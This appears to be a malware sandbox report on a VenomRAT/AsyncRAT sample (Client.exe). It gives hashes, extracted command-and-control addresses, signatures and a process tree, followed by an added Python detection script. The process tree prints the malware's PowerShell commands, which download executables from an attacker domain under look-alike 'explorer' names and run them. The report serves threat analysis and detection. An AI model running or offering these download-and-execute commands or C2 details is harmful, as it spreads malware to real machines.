Analysis

max time kernel: 150s
max time network: 147s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 11-10-2024 21:07
Behavioral task: behavioral1
Sample: Client.exe
Resource: win7-20241010-en
General

Target: Client.exe
Size: 75KB
MD5: 0cc47ff18d0e3298f9beab60d3aa579e
SHA1: 67c3020a046707cbde4dea02352272d6e6b77189
SHA256: 87dc5fec26bd15e8a2d4d47a3d29b8fe43be265666770bdecfb496c77c0e3212
SHA512: e0f0627aa715665a27e3b505af264c3c2500b9414764d028fa0ecba0dc979a187f75baf4f97b4793b31325dda65310d8a3e3eccfe676b1f7b13e47334b5fe5b3
SSDEEP: 1536:fukU0OSeCX/PMRkYKt2OlY6H1bf/i7AkzkiLVclN:fXUHjAPMRkYv4jH1bfVk7BY
Malware Config

Extracted: http://xcu.exgaming.click
Extracted: http://xcu5.exgaming.click

Extracted: asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
51.254.53.24:4449
86.68.222.14:4449
ygfmgwcmzefwhl
delay: 1
install: false
install_folder: %AppData%
Signatures

YARA rule match
Processes:
Resource: behavioral2/memory/3476-1-0x0000000000C70000-0x0000000000C88000-memory.dmp
YARA rule: VenomRAT

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Client.exe (PID 3476): key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation

Command and Scripting Interpreter: PowerShell
Processes:
powershell.exe PIDs 5072, 4800, 1864, 3176
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
1864 powershell.exe (2 entries)
3476 Client.exe (all remaining entries)
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes (privilege enabled on the process token):
SeDebugPrivilege: 3476 Client.exe
SeDebugPrivilege: 1864 powershell.exe
SeDebugPrivilege: 3176 powershell.exe
SeDebugPrivilege: 5072 powershell.exe
SeDebugPrivilege: 4800 powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
3476 Client.exe

Suspicious use of WriteProcessMemory 10 IoCs
Processes (each pair is reported twice):
PID 3476 Client.exe wrote to memory of PID 2512 cmd.exe
PID 2512 cmd.exe wrote to memory of PID 1864 powershell.exe
PID 2512 cmd.exe wrote to memory of PID 3176 powershell.exe
PID 2512 cmd.exe wrote to memory of PID 5072 powershell.exe
PID 2512 cmd.exe wrote to memory of PID 4800 powershell.exe
Every target is the writer's own direct child at creation time, which is what ordinary process creation looks like; nothing here indicates injection into an unrelated process.
Processes

C:\Users\Admin\AppData\Local\Temp\Client.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Client.exe"
  PID: 3476
  - Checks computer location settings
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\cmd.exe (child of 3476)
    Command line: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
    PID: 2512
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of 2512)
      Command line: powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
      PID: 1864
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of 2512)
      Command line: powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
      PID: 3176
      - Command and Scripting Interpreter: PowerShell
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of 2512)
      Command line: powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
      PID: 5072
      - Command and Scripting Interpreter: PowerShell
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of 2512)
      Command line: powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
      PID: 4800
      - Command and Scripting Interpreter: PowerShell
      - Suspicious use of AdjustPrivilegeToken

The cmd.exe line chains four PowerShell one-liners: two WebClient.DownloadFile calls that drop files under %Temp% (expanded to C:\Users\Admin\AppData\Local\Temp in the child command lines) and two Start-Process calls that run them. The dropped names ExpIorer.exe and ExplIorer.exe are look-alikes of explorer.exe (a capital I standing in for the lowercase l, plus one extra character in the second), so a casual glance at a process list would not single them out.
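The following is an added detection example; it is not part of the sandbox report and not code from the malware. It replays constructed process-creation events modelled on the tree above (PIDs, images and command lines for 3476, 2512, 1864, 3176, 5072 and 4800 are transcribed from the report; PID 1000 as the parent of Client.exe and the two benign control events are assumptions) and flags four patterns: a WebClient.DownloadFile destination in the user's Temp directory, Start-Process of a file in Temp, a file name that imitates a protected Windows binary after folding common confusable characters, and the Client.exe to cmd.exe to powershell.exe lineage. The PROTECTED_NAMES and CONFUSABLES tables are illustrative choices, not from the report.

```python
"""Replay constructed process-creation events and flag the download-to-Temp,
execute-from-Temp, look-alike-name and lineage patterns seen in this report."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation event, as Sysmon event ID 1 or an EDR would record it."""
    pid: int
    ppid: int
    image: str
    cmdline: str


PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events. PIDs 3476/2512/1864/3176/5072/4800 with their images and
# command lines follow the report; PID 1000 as parent of Client.exe and the two
# benign control events 6001/6002 are assumptions.
EVENTS: List[ProcEvent] = [
    ProcEvent(3476, 1000, r"C:\Users\Admin\AppData\Local\Temp\Client.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\Client.exe"'),
    ProcEvent(2512, 3476, r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient)'
              r".DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & "
              r"powershell (New-Object System.Net.WebClient).DownloadFile("
              r"'http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & "
              r"powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & "
              r"powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit"),
    ProcEvent(1864, 2512, PS_IMAGE,
              r"powershell (New-Object System.Net.WebClient).DownloadFile("
              r"'http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')"),
    ProcEvent(3176, 2512, PS_IMAGE,
              r"powershell (New-Object System.Net.WebClient).DownloadFile("
              r"'http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')"),
    ProcEvent(5072, 2512, PS_IMAGE,
              r"powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'"),
    ProcEvent(4800, 2512, PS_IMAGE,
              r"powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'"),
    ProcEvent(6001, 1000, PS_IMAGE, r"powershell Get-ChildItem C:\Users\Admin\Documents"),
    ProcEvent(6002, 1000, r"C:\Windows\explorer.exe", r"C:\Windows\explorer.exe"),
]

DOWNLOAD_RE = re.compile(r"DownloadFile\(\s*'(?P<url>[^']+)'\s*,\s*'(?P<dst>[^']+)'", re.I)
START_RE = re.compile(r"Start-Process\s+-FilePath\s+'(?P<path>[^']+)'", re.I)
# Unexpanded %Temp% (as in the cmd.exe line) or its expansion under the user profile.
TEMP_RE = re.compile(r"(?:^%temp%\\|\\AppData\\Local\\Temp\\)", re.I)
# Illustrative list of names an attacker imitates; extend per environment (assumption).
PROTECTED_NAMES = ("explorer.exe", "svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe")
# Characters commonly swapped for the letter they resemble (assumption: I/1/| for l, 0 for o).
CONFUSABLES = str.maketrans({"I": "l", "1": "l", "|": "l", "0": "o"})

Finding = Tuple[int, str, str]  # (pid, rule, detail)


def basename(path: str) -> str:
    """Last path component, tolerating the doubled backslashes seen in the report."""
    return re.split(r"[\\/]+", path)[-1]


def levenshtein(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(filename: str) -> Optional[str]:
    """Protected name this file name imitates, or None if it is exact or unrelated."""
    if filename.lower() in PROTECTED_NAMES:
        return None
    canon = filename.translate(CONFUSABLES).lower()  # fold confusables before comparing
    for target in PROTECTED_NAMES:
        if levenshtein(canon, target) <= 1:
            return target
    return None


def analyze(events: List[ProcEvent]) -> List[Finding]:
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    findings: List[Finding] = []
    for e in events:
        for m in DOWNLOAD_RE.finditer(e.cmdline):  # WebClient.DownloadFile into Temp
            dst = m.group("dst")
            if TEMP_RE.search(dst):
                findings.append((e.pid, "download_to_temp", f"{m.group('url')} -> {dst}"))
            target = lookalike_of(basename(dst))
            if target:
                findings.append((e.pid, "lookalike_filename", f"{basename(dst)} imitates {target}"))
        for m in START_RE.finditer(e.cmdline):  # Start-Process of a file in Temp
            path = m.group("path")
            if TEMP_RE.search(path):
                findings.append((e.pid, "start_process_from_temp", path))
            target = lookalike_of(basename(path))
            if target:
                findings.append((e.pid, "lookalike_filename", f"{basename(path)} imitates {target}"))
        if basename(e.image).lower() == "powershell.exe":  # lineage: Temp binary -> cmd -> powershell
            parent = by_pid.get(e.ppid)
            grand = by_pid.get(parent.ppid) if parent else None
            if (parent and basename(parent.image).lower() == "cmd.exe"
                    and grand and TEMP_RE.search(grand.image)):
                findings.append((e.pid, "powershell_via_cmd_from_temp",
                                 f"{basename(grand.image)} -> cmd.exe -> powershell.exe"))
    return findings


def rule_counts(events: List[ProcEvent]) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for _, rule, _ in analyze(events):
        counts[rule] = counts.get(rule, 0) + 1
    return counts


if __name__ == "__main__":
    for pid, rule, detail in analyze(EVENTS):
        print(f"PID {pid:<5} {rule:<28} {detail}")
```

The cmd.exe event alone yields eight findings because its single command line carries all four one-liners, so a rule that only inspects powershell.exe children would still fire four times per pattern but would miss the parent that stitched them together; matching on the unexpanded %Temp% as well as the expanded path is what lets both levels be caught. The two benign control events produce no findings.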
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 2KB
MD5: 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1: 445bf1b07223a04f8a159581a3d37d630273010f
SHA256: 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512: 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Filesize: 1KB
MD5: aa8efa56e1e40374bbd21e0e469dceb7
SHA1: 33a592799d4898c6efdd29e132f2f76ec51dbc08
SHA256: 25eb4f899ae8f90b66b9342781456700d1af487f6f302fe5a727328b026f6bdf
SHA512: ad6de575b83db36b239317e4c46a1eaeb0383d5909a12b69ee2b38798c2b5cb0d19b464f5689037501d20592d92c4d3d84f0e49fdb1c0648b6593481a183f096

Filesize: 1KB
MD5: fb4cb72fdb972bec9083e291598e5107
SHA1: 6208b997143f2ab175ac2bc5b827547c01ba9339
SHA256: a68190a9f6559f74a8c0ac2eef3b36b990d2cc032d8e3b565b6db38ac2f33ef6
SHA512: 3b34b2ec66dc18869c75207d9a6b3001d4ba451404de7e64aaab3b41f822607aeb8997963d925bf1363d00ee354c44574b87c5573d8a3f044625992fc8614ba5

Filesize: 1KB
MD5: cf989d8b59ce7eb32775f651bfe5887c
SHA1: 790b46aba93b4571facca9d3b6dc4d07ad0a53b2
SHA256: 7b229a233c8625cd83ca18f6853abfb05f32a1b31455fcd2cb90005a4575490c
SHA512: 782b93a7173805ad42caa07ca2bfcd3c3ced136a04554765189e7bdde0518b29b29eb33446327f22f6d370030f10e08a54687557944ddeec0c223a2623e220f7

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82